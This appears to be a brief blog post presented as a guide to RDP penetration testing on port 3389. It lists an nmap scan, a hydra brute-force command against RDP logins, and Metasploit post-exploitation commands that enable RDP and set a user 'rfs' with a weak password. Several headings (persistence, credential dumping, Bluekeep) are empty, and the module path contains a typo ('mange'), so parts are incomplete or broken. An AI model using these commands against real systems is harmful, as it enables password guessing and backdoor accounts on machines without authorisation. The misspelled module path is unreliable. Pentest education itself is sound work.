Posted in: Network Security

Free Guide to RDP Penetration Testing port 3389

Welcome, today I am writing about RDP Penetration Testing fundamentals, I will explain how to enumerate Remote Desktop Service and how to use it to escalate privileges.

RDP Penetration Testing

Introduction

Scanning RDP

nmap -A -sV 192.168.1.131 -p3389

Brute Force RDP

hydra -L userslist.txt -P wordlist.txt 192.168.1.131 rdp

Post Exploitation

use post/windows/mange/enable_rdp
set username rfs
set password Password123!
set session 1
exploit

Persistence

Credential Dumping

RDP Exploits

Bluekeep

Leave a Reply

Back to Top